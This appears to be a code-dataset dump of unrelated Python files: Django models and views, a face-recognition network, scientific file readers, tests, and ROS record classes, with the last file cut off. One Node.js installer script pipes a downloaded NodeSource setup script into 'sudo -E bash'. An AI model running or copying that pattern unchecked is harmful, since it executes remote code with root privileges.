content
stringlengths 5
1.05M
|
|---|
from django.utils import timezone
from django.conf import settings
from django.db.utils import ProgrammingError
from django.contrib.contenttypes.models import (
ContentType,
)
from django.db.models import (
Model,
CharField,
DateTimeField,
ForeignKey,
CASCADE,
TextField,
DateField,
PositiveIntegerField,
BooleanField,
Q,
)
from django.utils.translation import ugettext_lazy as _
from tagulous.models import (
TagField,
TagTreeModel,
)
EVENT_CONTENT_TYPE_CHOICES = (
Q(app_label='configs', model='abstractproduct')
| Q(app_label='configs', model='config')
)
try:
DEFAULT_EVENT_CONTENT_TYPE_ID = ContentType.objects.get(model='abstractproduct').id
except ProgrammingError:
DEFAULT_EVENT_CONTENT_TYPE_ID = 1
class EventType(TagTreeModel):
class TagMeta:
space_delimiter = False
autocomplete_view = 'events:api:event_type_autocomplete'
class Meta:
verbose_name = _('Event Type')
verbose_name_plural = _('Event Types')
ordering = ('level',)
def __str__(self):
return str(self.label)
def __unicode__(self):
return str(self.label)
class Event(Model):
user = ForeignKey(settings.AUTH_USER_MODEL, default=1)
content_type = ForeignKey(ContentType,
default=DEFAULT_EVENT_CONTENT_TYPE_ID,
limit_choices_to=EVENT_CONTENT_TYPE_CHOICES,
on_delete=CASCADE)
object_id = PositiveIntegerField(default=1)
types = TagField(EventType, verbose_name=_('Event Type'), help_text=_('You can create new event type here'))
name = CharField(max_length=120, unique=False, verbose_name=_('Name'))
context = TextField(verbose_name=_('Context'))
date = DateField(auto_now=False, default=timezone.now().today, verbose_name=_('Date'))
share = BooleanField(default=False, verbose_name=_('Shared Event'))
update_time = DateTimeField(auto_now=True, null=True, blank=True, verbose_name=_('Updated'))
class Meta:
verbose_name = _('Event')
verbose_name_plural = _('Events')
def __str__(self):
return str(self.name)
def __unicode__(self):
return str(self.name)
|
import sys
sys.path.append('..')
import traceback
import genericBotBase.botbase as BotBase
log = BotBase.log
config = BotBase.config
bot = BotBase.bot
extensions = [
'genericBotBase.cogs.admin',
'genericBotBase.cogs.common',
'genericBotBase.cogs.basic',
'cogs.QueueCommands'
]
def main():
BotBase.loadExtensions( extensions )
BotBase.run()
if __name__ == '__main__':
main()
|
from tensorflow.keras import backend as K
from tensorflow.keras.layers import (
Input,
Conv2D,
BatchNormalization,
Layer,
PReLU,
SeparableConv2D,
DepthwiseConv2D,
add,
Flatten,
Dense,
Dropout,
GlobalAveragePooling2D,
Reshape,
Multiply,
)
from tensorflow.keras.models import Model
"""Building Block Functions"""
def se_block(inputs, reduction=16):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
filters = inputs.shape[channel_axis]
nn = GlobalAveragePooling2D()(inputs)
nn = Reshape((1, 1, filters))(nn)
nn = Conv2D(filters // reduction, kernel_size=1)(nn)
nn = PReLU(shared_axes=[1, 2])(nn)
nn = Conv2D(filters, kernel_size=1, activation="sigmoid")(nn)
nn = Multiply()([inputs, nn])
return nn
def se_block_2(inputs, reduction=16):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
filters = inputs.shape[channel_axis]
se = GlobalAveragePooling2D()(inputs)
se = Dense(filters // reduction, activation="PReLU", use_bias=False)(se)
se = Dense(filters, activation="sigmoid", use_bias=False)(se)
# if K.image_data_format() == 'channels_first':
# se = Permute((3, 1, 2))(se)
x = Multiply()([inputs, se])
return x
def conv_block(inputs, filters, kernel_size, strides, padding):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
Z = Conv2D(filters, kernel_size, strides=strides, padding=padding, use_bias=False)(inputs)
Z = BatchNormalization(axis=channel_axis)(Z)
A = PReLU(shared_axes=[1, 2])(Z)
return A
def separable_conv_block(inputs, filters, kernel_size, strides):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
Z = SeparableConv2D(filters, kernel_size, strides=strides, padding="same", use_bias=False)(inputs)
Z = BatchNormalization(axis=channel_axis)(Z)
A = PReLU(shared_axes=[1, 2])(Z)
return A
def bottleneck(inputs, filters, kernel, t, s, r=False, se=False):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
tchannel = K.int_shape(inputs)[channel_axis] * t
Z1 = conv_block(inputs, tchannel, 1, 1, "same")
Z1 = DepthwiseConv2D(kernel, strides=s, padding="same", depth_multiplier=1, use_bias=False)(Z1)
Z1 = BatchNormalization(axis=channel_axis)(Z1)
A1 = PReLU(shared_axes=[1, 2])(Z1)
Z2 = Conv2D(filters, 1, strides=1, padding="same", use_bias=False)(A1)
Z2 = BatchNormalization(axis=channel_axis)(Z2)
if se:
Z2 = se_block(Z2)
if r:
Z2 = add([Z2, inputs])
return Z2
def inverted_residual_block(inputs, filters, kernel, t, strides, n, se=False):
Z = bottleneck(inputs, filters, kernel, t, strides, se=se)
for i in range(1, n):
Z = bottleneck(Z, filters, kernel, t, 1, True, se=se)
return Z
def linear_GD_conv_block(inputs, kernel_size, strides):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
Z = DepthwiseConv2D(kernel_size, strides=strides, padding="valid", depth_multiplier=1, use_bias=False)(inputs)
Z = BatchNormalization(axis=channel_axis)(Z)
return Z
def mobile_facenet(
emb_shape=128, input_shape=(112, 112, 3), dropout=1, name="mobile_facenet", weight_file=None, use_se=False, include_top=True
):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
if K.image_data_format() == "channels_first":
X = Input(shape=(input_shape[-1], input_shape[0], input_shape[1]))
else:
X = Input(shape=input_shape)
M = conv_block(X, 64, 3, 2, "same") # Output Shape: (56, 56, 64)
M = separable_conv_block(M, 64, 3, 1) # (56, 56, 64)
M = inverted_residual_block(M, 64, 3, t=2, strides=2, n=5, se=use_se) # (28, 28, 64)
M = inverted_residual_block(M, 128, 3, t=4, strides=2, n=1, se=use_se) # (14, 14, 128)
M = inverted_residual_block(M, 128, 3, t=2, strides=1, n=6, se=use_se) # (14, 14, 128)
M = inverted_residual_block(M, 128, 3, t=4, strides=2, n=1, se=use_se) # (7, 7, 128)
M = inverted_residual_block(M, 128, 3, t=2, strides=1, n=2, se=use_se) # (7, 7, 128)
if include_top:
""" GDC """
M = Conv2D(512, 1, use_bias=False)(M) # (7, 7, 512)
M = BatchNormalization(axis=channel_axis)(M)
M = PReLU(shared_axes=[1, 2])(M)
M = DepthwiseConv2D(int(M.shape[1]), depth_multiplier=1, use_bias=False)(M) # (1, 1, 512)
M = BatchNormalization(axis=channel_axis)(M)
if dropout > 0 and dropout < 1:
M = Dropout(dropout)(M)
M = Conv2D(emb_shape, 1, use_bias=False, activation=None)(M)
M = Flatten()(M)
M = BatchNormalization(axis=channel_axis, name="embedding")(M)
model = Model(inputs=X, outputs=M, name=name)
if weight_file:
model.load_weights(weight_file)
return model
|
# -*- coding: utf-8 -*-
import os
import pytest
from gaas_sample import *
def test_local_input(create_gaas_calc, configure_with_daemon, assert_finished):
from aiida.work.run import run
process, inputs = create_gaas_calc()
output, pid = run(process, _return_pid=True, **inputs)
assert all(key in output for key in ['retrieved', 'output_parameters'])
assert_finished(pid)
def test_changed_seedname(
create_gaas_calc, configure_with_daemon, assert_finished
):
from aiida.work.run import run
process, inputs = create_gaas_calc(seedname='wannier90')
output, pid = run(process, _return_pid=True, **inputs)
assert all(key in output for key in ['retrieved', 'output_parameters'])
assert_finished(pid)
def test_changed_seedname_empty_settings(
create_gaas_calc, configure_with_daemon, assert_state
):
from aiida.work.run import run
from aiida.orm import DataFactory
from aiida.common.datastructures import calc_states
process, inputs = create_gaas_calc(seedname='wannier90')
inputs.settings = DataFactory('parameter')()
output, pid = run(process, _return_pid=True, **inputs)
assert_state(pid, calc_states.SUBMISSIONFAILED)
def test_empty_settings(create_gaas_calc, configure_with_daemon, assert_state):
from aiida.work.run import run
from aiida.orm import DataFactory
from aiida.common.datastructures import calc_states
process, inputs = create_gaas_calc()
inputs.settings = DataFactory('parameter')()
output, pid = run(process, _return_pid=True, **inputs)
assert_state(pid, calc_states.FINISHED)
def test_changed_seedname_no_settings(
create_gaas_calc, configure_with_daemon, assert_state
):
from aiida.work.run import run
from aiida.common.datastructures import calc_states
process, inputs = create_gaas_calc(seedname='wannier90')
del inputs.settings
output, pid = run(process, _return_pid=True, **inputs)
assert_state(pid, calc_states.SUBMISSIONFAILED)
def test_duplicate_exclude_bands(
create_gaas_calc, configure_with_daemon, assert_state
):
from aiida.work.run import run
from aiida.orm import DataFactory
from aiida.common.datastructures import calc_states
process, inputs = create_gaas_calc(
projections_dict={
'kind_name': 'As',
'ang_mtm_name': 's'
}
)
inputs.parameters = DataFactory('parameter')(
dict=dict(
num_wann=1,
num_iter=12,
wvfn_formatted=True,
exclude_bands=[1] * 2 + [2, 3]
)
)
output, pid = run(process, _return_pid=True, **inputs)
assert all(key in output for key in ['retrieved', 'output_parameters'])
assert_state(pid, calc_states.FAILED)
|
#!/usr/bin/env python
# ryan g. coleman, ryangc@mail.med.upenn.edu
# kim sharp lab
# phi.py enables read/write of binary phi-maps from delphi
# usage is import, then pass in filename to object creation
# extensions written in bks lab, 2012, and by extensions i mean reading
# phimap files written by a pgf, 32-bit version of delphi that is being
# used in dockblaster, etc. these files are always big-endian despite any
# claims by the OS to the contrary
import struct
import array
import sys
import string
import os
import math
import copy
#import gzip, bz2 #for compressed file reading (not enabled yet)
# format follows
# character*20 toplabel
# character*10 head,character*60 title
# real*4 phi(65,65,65) #or now 193,193,193
# character*16 botlabel
# real*4 scale, oldmid(3)
def grid_size_from_file_size(file_size):
grid_bytes = file_size - 162 # 162 is number of fixed bytes in a grid file
grid_points = grid_bytes / 4.0 # 4 bytes per float
grid_size = grid_points ** (1.0/3.0) # Cube root of grid points is size
grid_size = int(math.ceil(grid_size))
return grid_size
class phi(object):
def __init__(self, phiFileName=False, is64=False, gridSizes=None):
'''reads the phi file from disk'''
if gridSizes is None:
gridSizes = (None,)
self.oldmid = [0., 0., 0.]
self.__minsmaxs = None
self.__boundaries = None
if phiFileName: # otherwise just creating an empty phi map for writing
for gridSize in gridSizes:
if gridSize is None:
gridSize = grid_size_from_file_size(os.stat(phiFileName).st_size)
print "Determined size to be", gridSize
try:
phiFile = open(phiFileName, 'rb') # b is for binary, r is for read
tempArray = array.array('f')
junk = struct.unpack('4s', phiFile.read(4))
(check,) = struct.unpack('4s', phiFile.read(4))
if check == "now ": # this changed, but this is now correct
#print "32bit phimap"
pass
else:
#print "64bit phimap"
is64 = True
if not is64:
(temptop,) = struct.unpack('16s', phiFile.read(16))
self.toplabel = check + temptop
else:
(temptop,) = struct.unpack('20s', phiFile.read(20))
self.toplabel = temptop
#print "toplabel:", self.toplabel
junk = struct.unpack('8s', phiFile.read(8))
if is64:
junk = struct.unpack('8s', phiFile.read(8))
(self.head,) = struct.unpack('10s', phiFile.read(10))
#print "head:", self.head
(self.title,) = struct.unpack('60s', phiFile.read(60))
#print "title:", self.title
junk = struct.unpack('8s', phiFile.read(8))
if is64:
junk = struct.unpack('8s', phiFile.read(8))
#next line raises error if grid too big
#GxGxG -> packed into an array xyz order samplePhi = array.array('f')
tempArray.fromfile(phiFile, gridSize**3)
tempArray.byteswap()
#for count in xrange(gridSize**3):
# bats = phiFile.read(4) #raw characters
# blah = struct.unpack('>f', bats)[0] #always big-endian
# tempArray.append(blah)
junk = struct.unpack('8s', phiFile.read(8))
if is64:
junk = struct.unpack('8s', phiFile.read(8))
self.gridDimension = gridSize
self.phiArray = tempArray
break # read successfully, just go on and read the last bits
except EOFError:
phiFile.close()
(self.botlabel,) = struct.unpack('16s', phiFile.read(16))
#print "botlabel:", self.botlabel
junk = struct.unpack('8s', phiFile.read(8))
if is64:
junk = struct.unpack('8s', phiFile.read(8))
#>ffff on next line forces big-endian reading
(self.scale, self.oldmid[0], self.oldmid[1], self.oldmid[2],) = \
struct.unpack('>ffff', phiFile.read(16))
#print "scale, oldmid:", self.scale, self.oldmid
junk = struct.unpack('4s', phiFile.read(4))
phiFile.close()
def copyPhi(self):
'''make a deep copy of the phimap that can be edited without disturbing the
original.'''
newPhi = phi()
newPhi.oldmid = self.oldmid
newPhi.toplabel = self.toplabel
newPhi.head = self.head
newPhi.title = self.title
newPhi.botlabel = self.botlabel
newPhi.scale = self.scale
newPhi.phiArray = self.phiArray
newPhi.gridDimension = self.gridDimension
newPhi.__minsmaxs = None
newPhi.__boundaries = None
return newPhi
def write(self, phiFileName=False):
'''write data to member data structure manually,
then call this to write to file
the pad lines reproduce the binary padding of an original
fortran formatted phi file'''
if phiFileName: # do nothing if no filename given
outArray = copy.deepcopy(self.phiArray)
outArray.byteswap() # switch endianness back, only for writing
phiFile = open(phiFileName, 'wb') # b may be unnecessary, have to check
phiFile.write(struct.pack('4b', 0, 0, 0, 20)) # pad
phiFile.write(struct.pack('20s', self.toplabel))
phiFile.write(struct.pack('8b', 0, 0, 0, 20, 0, 0, 0, 70)) # pad
phiFile.write(struct.pack('10s', self.head))
phiFile.write(struct.pack('60s', self.title))
phiFile.write(struct.pack('4b', 0, 0, 0, 70)) # pad, always same
phiFile.write(struct.pack('>l', len(outArray)*4)) # diff. pad sometimes
#print "writing this many data points in phimap:", len(outArray)
outArray.tofile(phiFile) # array
phiFile.write(struct.pack('>l', len(outArray)*4)) # diff. pad sometimes
phiFile.write(struct.pack('4b', 0, 0, 0, 16)) # pad, always same
phiFile.write(struct.pack('16s', self.botlabel))
phiFile.write(struct.pack('8b', 0, 0, 0, 16, 0, 0, 0, 16)) # pad
phiFile.write(struct.pack(
'>ffff', self.scale, self.oldmid[0], self.oldmid[1], self.oldmid[2]))
#> on previous line forces big-endian writing
phiFile.write(struct.pack('4b', 0, 0, 0, 16)) # pad
phiFile.close()
def trimPhi(self, newmidIndices, newSize):
'''for a new center index and a desired cubic grid size, trim the current
phimap and return the new trimmed phimap'''
plusMinus = (newSize - 1) / 2 # how many to add or subtract from the center
newPhi = phi()
newPhi.oldmid = self.getXYZlist(newmidIndices) # only change of these data
newPhi.toplabel = self.toplabel
newPhi.head = self.head
newPhi.title = self.title
newPhi.botlabel = self.botlabel
newPhi.scale = self.scale
#the phiArray does change
newPhi.phiArray = array.array('f')
for oldIndexZ in xrange(
newmidIndices[2] - plusMinus, newmidIndices[2] + plusMinus + 1):
for oldIndexY in xrange(
newmidIndices[1] - plusMinus, newmidIndices[1] + plusMinus + 1):
for oldIndexX in xrange(
newmidIndices[0] - plusMinus, newmidIndices[0] + plusMinus + 1):
if oldIndexX >= 0 and oldIndexX < self.gridDimension and \
oldIndexY >= 0 and oldIndexY < self.gridDimension and \
oldIndexZ >= 0 and oldIndexZ < self.gridDimension:
newPhi.phiArray.append(
self.getValue(oldIndexX, oldIndexY, oldIndexZ))
else:
newPhi.phiArray.append(0.0) # outside the original grid.
#print "total array size is:", len(newPhi.phiArray)
return newPhi
def findPhiCorners(self, newmidIndices, newSize):
'''for a new center index and a desired cubic grid size, find the new
corners of the phimap'''
plusMinus = (newSize - 1) / 2 # how many to add or subtract from the center
lowerLeft = \
[newmidIndices[0] - plusMinus, newmidIndices[1] - plusMinus,
newmidIndices[2] - plusMinus]
upperRight = \
[newmidIndices[0] + plusMinus + 1, newmidIndices[1] + plusMinus + 1,
newmidIndices[2] + plusMinus + 1]
return lowerLeft, upperRight
def findNewPhiIndices(self, newmidIndices, newSize):
'''for a new center index and a desired cubic grid size, return xyz coords
of each coordinate in the new box'''
coordList = []
plusMinus = (newSize - 1) / 2 # how many to add or subtract from the center
for oldIndexZ in xrange(
newmidIndices[2] - plusMinus, newmidIndices[2] + plusMinus + 1):
for oldIndexY in xrange(
newmidIndices[1] - plusMinus, newmidIndices[1] + plusMinus + 1):
for oldIndexX in xrange(
newmidIndices[0] - plusMinus, newmidIndices[0] + plusMinus + 1):
coordList.append((oldIndexX, oldIndexY, oldIndexZ))
return coordList
def getMinsMaxs(self):
'''finds the positions of the extreme grid corners'''
if self.__minsmaxs is None:
mins, maxs = [], []
for center in self.oldmid:
mins.append(center - ((self.gridDimension - 1.)/(2. * self.scale)))
maxs.append(center + ((self.gridDimension - 1.)/(2. * self.scale)))
self.__minsmaxs = mins, maxs
return self.__minsmaxs
def getMinMaxValues(self):
'''finds the minimum and maximum value'''
return min(self.phiArray), max(self.phiArray)
def getMeanAbsoluteValues(self):
'''takes the abs value of each phi value, then the average'''
sum = 0.0
for value in self.phiArray:
sum += math.fabs(value)
return sum/float(len(self.phiArray))
def getMeanValues(self):
'''mean of all phi values'''
sum = 0.0
for value in self.phiArray:
sum += value
return sum/float(len(self.phiArray))
def getMaxValues(self):
'''just the max'''
return max(self.phiArray)
def countValues(self):
'''counts the occurence of each value'''
counts = {}
for value in self.phiArray:
if value in counts:
counts[value] += 1
else:
counts[value] = 1
return counts
def histogramValues(self, width=1., useMin=None, useMax=None):
'''makes a basic histogram'''
ends = list(self.getMinMaxValues())
if useMin is not None:
ends[0] = useMin
if useMax is not None:
ends[1] = useMax
bars = int(math.ceil((ends[1] - ends[0]) / width) + 1)
counts = [0 for x in xrange(bars)]
for value in self.phiArray:
if value >= ends[0] and value <= ends[1]:
counts[int(math.floor((value - ends[0]) / width))] += 1
return counts
def getXYZlist(self, xyz):
'''changes list to x,y,z calls getXYZ'''
return self.getXYZ(xyz[0], xyz[1], xyz[2])
def getXYZ(self, xInd, yInd, zInd):
'''returns the xyz coordinate of the center of the box'''
mins, maxs = self.getMinsMaxs()
gap = 1./self.scale
return mins[0]+(xInd*gap), mins[1]+(yInd*gap), mins[2]+(zInd*gap)
def getValueList(self, xyz):
'''changes list into x, y, z then calls getValue'''
return self.getValue(xyz[0], xyz[1], xyz[2])
def getValue(self, xInd, yInd, zInd):
'''for a given set of indices, return the value in the array'''
index = int(zInd*(self.gridDimension**2.) + yInd*self.gridDimension + xInd)
return self.phiArray[index]
def getValueListCheckBounds(self, xyzList, retValueIfBad=0):
'''passes to getValueCheckBounds'''
return self.getValueCheckBounds(
xyzList[0], xyzList[1], xyzList[2], retValueIfBad)
def getValueCheckBounds(self, xInd, yInd, zInd, retValueIfBad=0):
'''does grid bounds checking first, returns retValueIfBad if outside grid,
otherwise call getvalue'''
if xInd >= 0 and xInd < self.gridDimension and \
yInd >= 0 and yInd < self.gridDimension and \
zInd >= 0 and zInd < self.gridDimension:
return self.getValue(xInd, yInd, zInd)
else:
return retValueIfBad
def setValueList(self, xyz, value):
'''calls setValue with expanded xyz into items'''
self.setValue(xyz[0], xyz[1], xyz[2], value)
def setValue(self, xInd, yInd, zInd, value):
'''puts the value into the phi array'''
index = int(zInd*(self.gridDimension**2.) + yInd*self.gridDimension + xInd)
self.phiArray[index] = value
def transform(self, threshold=6.0, inside=-2.0, outside=-1.0):
'''for every value in the array, change it to inside or outside,
destructively overwrites old values'''
for index in xrange(len(self.phiArray)):
value = self.phiArray[index]
if value < threshold:
where = outside
else:
where = inside
self.phiArray[index] = where
def subtract(self, other):
'''subtract other from self, destructively write over self'''
self.modify(other, -1)
def add(self, other):
'''add other to self, destructively write over self.'''
self.modify(other, 1)
def modify(self, other, change):
'''modify other to self, destructively write over self. allows +-/etc
presume without checking that grids are compatible (same mid etc)'''
for index in xrange(len(self.phiArray)):
value = other.phiArray[index]
#save = self.phiArray[index]
self.phiArray[index] += (value * change)
#if self.phiArray[index] != 0.0:
# print self.phiArray[index], value, save, index
def findBoundaries(
self, inside=-2.0, border=2, pointXYZ=None, pointList=None):
'''finds the extreme x,y,z positions that enclose all inside positions'''
if self.__boundaries is None: # need to calculate it
if pointXYZ is not None:
self.__boundaries = self.findPointMinsMaxs(pointXYZ, pointList)
else:
self.__boundaries = [self.gridDimension, self.gridDimension,
self.gridDimension], [0, 0, 0]
for x in xrange(self.gridDimension):
for y in xrange(self.gridDimension):
for z in xrange(self.gridDimension):
if x < self.__boundaries[0][0] or x > self.__boundaries[1][0] or \
y < self.__boundaries[0][1] or y > self.__boundaries[1][1] or \
z < self.__boundaries[0][2] or z > self.__boundaries[1][2]:
value = self.getValue(x, y, z)
if value == inside:
indices = (x, y, z)
for coord in xrange(3):
self.__boundaries[0][coord] = min(
self.__boundaries[0][coord], indices[coord])
self.__boundaries[1][coord] = max(
self.__boundaries[1][coord], indices[coord])
for coord in range(3):
self.__boundaries[0][coord] = max(
0, self.__boundaries[0][coord] - border)
self.__boundaries[1][coord] = min(
self.gridDimension, self.__boundaries[1][coord]+border)
return self.__boundaries
def getBoundaryLengths(self, inside=-2.0, border=2):
'''calls findBoundaries if necessary, returns the lengths (max-min)'''
if self.__boundaries is None: # need to calculate it
self.findBoundaries(inside, border)
lengths = [self.__boundaries[1][0] - self.__boundaries[0][0],
self.__boundaries[1][1] - self.__boundaries[0][1],
self.__boundaries[1][2] - self.__boundaries[0][2]]
return lengths
def createFromGrid(
self, grid, gridSize, defaultValue=0.0, toplabel="",
head="", title="", botlabel="", lowestGridSize=65):
'''does grid->phi data structure conversion'''
self.toplabel = toplabel[:20] # easy stuff first
self.head = head[:10]
self.title = title[:60]
self.botlabel = botlabel[:16]
lens = [len(grid), len(grid[0]), len(grid[0][0])]
#have to expand to valid gridSize
newGridSize = 0
for possibleGridSize in self.gridSizes:
good = True
if possibleGridSize < lowestGridSize:
good = False
for oneLength in lens:
if oneLength > possibleGridSize:
good = False
if good:
newGridSize = possibleGridSize
self.gridDimension = newGridSize
#now take care of the grid
self.phiArray = array.array('f')
for z in xrange(self.gridDimension):
for y in xrange(self.gridDimension):
for x in xrange(self.gridDimension):
if x < lens[0] and y < lens[1] and z < lens[2]:
self.phiArray.append(grid[x][y][z][0])
else: # outside real grid
self.phiArray.append(defaultValue)
#scale and oldmid are all that is left
self.scale = 1./gridSize
for coord in xrange(3):
self.oldmid[coord] = grid[0][0][0][coord + 1] \
- (gridSize / 2.) + (self.gridDimension / self.scale) / 2.
#data should be ready for writing now
def findPointMinsMaxs(self, pointXYZ, pointList):
minsPts = pointXYZ[0][1:]
maxsPts = pointXYZ[0][1:]
for point in pointList:
xyz = pointXYZ[point-1][1:]
for coord in range(3):
minsPts[coord] = min(minsPts[coord], xyz[coord])
maxsPts[coord] = max(maxsPts[coord], xyz[coord])
newMins = list(self.getIndices(minsPts))
newMaxs = list(self.getIndices(maxsPts)) # so they initialize to pts
return newMins, newMaxs
def getIndices(self, pt):
'''helper function to find the box a point is in'''
mins, maxs = self.getMinsMaxs()
gridSize = 1./self.scale
xIndex = int(math.floor((pt[0]-mins[0])/gridSize))
yIndex = int(math.floor((pt[1]-mins[1])/gridSize))
zIndex = int(math.floor((pt[2]-mins[2])/gridSize))
#print xIndex, yIndex, zIndex, mins, pt, maxs
return xIndex, yIndex, zIndex
def trilinear_interpolation(self, point):
'''for a given point, find the box it is in, the trilinearly interpolate
and return the value at that point. this is in kT, as that is what phiMaps
hold. for usual applications, you want to take this times the charge and
0.5924 to put it in kcal/mol'''
ptX, ptY, ptZ = self.getIndices(point)
values = [0. for count in xrange(8)]
values[7] = self.getValue(ptX, ptY, ptZ)
values[6] = self.getValue(ptX, ptY, ptZ + 1) - values[7]
values[5] = self.getValue(ptX, ptY + 1, ptZ) - values[7]
values[4] = self.getValue(ptX + 1, ptY, ptZ) - values[7]
values[3] = self.getValue(ptX, ptY + 1, ptZ + 1) - values[7] - \
values[6] - values[5]
values[2] = self.getValue(ptX + 1, ptY, ptZ + 1) - values[7] - \
values[6] - values[4]
values[1] = self.getValue(ptX + 1, ptY + 1, ptZ) - values[7] - \
values[5] - values[4]
values[0] = self.getValue(ptX + 1, ptY + 1, ptZ + 1) - values[7] - \
values[6] - values[5] - values[4] - values[3] - values[2] - values[1]
gridPoint = self.getXYZ(ptX, ptY, ptZ)
fraction = [0. for count in xrange(3)]
for count in xrange(3):
fraction[count] = point[count] - gridPoint[count]
returnPhiValue = values[0] * fraction[0] * fraction[1] * fraction[2] + \
values[1] * fraction[0] * fraction[1] + \
values[2] * fraction[0] * fraction[2] + \
values[3] * fraction[1] * fraction[2] + values[4] * fraction[0] + \
values[5] * fraction[1] + values[6] * fraction[2] + values[7]
#print values, fraction, returnPhiValue
return returnPhiValue
def trimToBoxCenterAndSize(self, corners, center, dimensions):
'''given a box, find the new center and size of a valid phimap based on
this current phimap'''
#print corners, center, dimensions
#print self.scale, self.oldmid
#find the midpoint and corners
centerIndices = self.getIndices(center)
newmid = self.getXYZlist(centerIndices) # becomes the new oldmid
onecorner = self.getIndices(corners[0:3])
twocorner = [coord + 1 for coord in self.getIndices(corners[3:6])]
#phimap grid can only be cubic
biggestDimension = 0
if twocorner[1] - onecorner[1] > twocorner[0] - onecorner[0]:
biggestDimension = 1
if (twocorner[2] - onecorner[2] >
twocorner[biggestDimension] - onecorner[biggestDimension]):
biggestDimension = 2
newSize = twocorner[biggestDimension] - onecorner[biggestDimension]
if 0 == newSize % 2: # if size is even, that's not allowed, so,
newSize += 1 # make it odd
return centerIndices, newSize
def trimToBox(self, corners, center, dimensions):
'''given a box (see box.py) trim so that the box is enclosed but not more.
returns the new trimmed phimap'''
centerIndices, newSize = self.trimToBoxCenterAndSize(
corners, center, dimensions)
return self.trimPhi(centerIndices, newSize), centerIndices, newSize
if -1 != string.find(sys.argv[0], "phi.py"):
#if (len(sys.argv) > 1): #want to test output of phimaps
# phiData.write(sys.argv[2])
if (len(sys.argv) > 1):
phiSize = int(sys.argv[2])
else:
phiSize = None
phiData = phi(sys.argv[1], gridSizes=(phiSize,))
#print phiData.countValues()
#print phiData.getMinMaxValues()
print phiData.getMeanAbsoluteValues()
print phiData.scale
print phiData.oldmid
|
from django.contrib.admin.models import LogEntry
from django.core.exceptions import PermissionDenied
from django.views import generic
class AdminActionsHistory(generic.ListView):
template_name = 'admin/actions_history.html'
model = LogEntry
context_object_name = "actions_history_list"
paginate_by = 25
def dispatch(self, request, *args, **kwargs):
if not request.user.is_staff:
raise PermissionDenied # HTTP 403
return super(AdminActionsHistory, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(AdminActionsHistory, self).get_context_data(**kwargs)
context["title"] = ""
return context
|
import os
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
#Update system
print(" ")
print(bcolors.OKGREEN + "Updating your system as sudo" + bcolors.ENDC)
print(" ")
os.system("sudo apt-get update")
#Asks for Version
print(" ")
version = input(bcolors.OKGREEN + "What version of nodejs do you want? (type the number of the version 8, 10, 11, 12):" + bcolors.ENDC)
#Check version
if version == "8":
print(bcolors.WARNING + "Installing nodejs v.8x" + bcolors.ENDC)
os.system("curl -sL https://deb.nodesource.com/setup_8.x | sudo -E bash -")
os.system("sudo apt-get install -y nodejs")
if version == "10":
print(bcolors.WARNING + "Installing nodejs v.10x" + bcolors.ENDC)
os.system("curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -")
os.system("sudo apt-get install -y nodejs")
if version == "11":
print(bcolors.WARNING + "Installing nodejs v.11x" + bcolors.ENDC)
os.system("curl -sL https://deb.nodesource.com/setup_11.x | sudo -E bash -")
os.system("sudo apt-get install -y nodejs")
if version == "12":
print(bcolors.WARNING + "Installing nodejs v.12x" + bcolors.ENDC)
os.system("curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -")
os.system("sudo apt-get install -y nodejs")
#Checking if version installed
print(bcolors.OKGREEN)
print("Node:")
os.system("node -v")
print(" ")
print("NPM:")
os.system("npm -v")
print(bcolors.ENDC)
#Tell the user that the process has finished
print(bcolors.OKGREEN + "The process is completed" + bcolors.ENDC)
print(" ")
print(bcolors.WARNING + "Check for any errors" + bcolors.ENDC)
print(" ")
print(bcolors.OKBLUE + "Thanks for using this tool, please ask for more installations in the github repository" + bcolors.ENDC)
print(" ")
|
from app import app, models
from datetime import datetime
task1 = models.Todoitem('Finish Flask App', 'Use a great mix of latest py.tech to finish To-Do app.', datetime.now().date(), True)
task2 = models.Todoitem('Remember the milk', 'Buy low-fat and fresh milk', datetime.now().date(), False)
print('Addding a few sample to-do tasks.. done!')
models.db.session.add(task1)
models.db.session.add(task2)
models.db.session.commit()
|
import pdb
import numpy
import bag_records.records
import copy
class Bool(bag_records.records.RecordBase):
"""Record for std_msgs/Bool types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Bool, self).__init__(has_msg_time=has_msg_time, interpolate=False)
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Float32(bag_records.records.RecordBase):
"""Record for std_msgs/Float32 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Float32, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Float32MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Float32MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Float32MultiArray, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Float64(bag_records.records.RecordBase):
"""Record for std_msgs/Float64 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Float64, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Float64MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Float64MultiArray types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
